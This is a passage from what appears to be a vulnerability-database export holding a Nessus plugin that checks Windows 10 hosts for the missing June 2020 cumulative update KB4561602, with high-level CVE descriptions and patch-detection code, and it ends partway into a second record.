the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. 
(CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. 
An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. 
An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. 
An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561602: Windows 10 Version 1709 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1264", "CVE-2020-1196", 
"CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561602.NASL", "href": "https://www.tenable.com/plugins/nessus/137255", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137255);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n 
\"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561602\");\n script_xref(name:\"MSFT\", value:\"MS20-4561602\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561602: Windows 10 Version 1709 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561602.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. 
(CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. 
(CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. 
An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. 
An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. 
(CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
(CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. 
(CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. 
An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4561602/windows-10-update-kb4561602\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?506489a5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561602.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561602'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'16299',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561602])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:06", "description": "The remote Windows host is missing security update 4561608.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. 
(CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. 
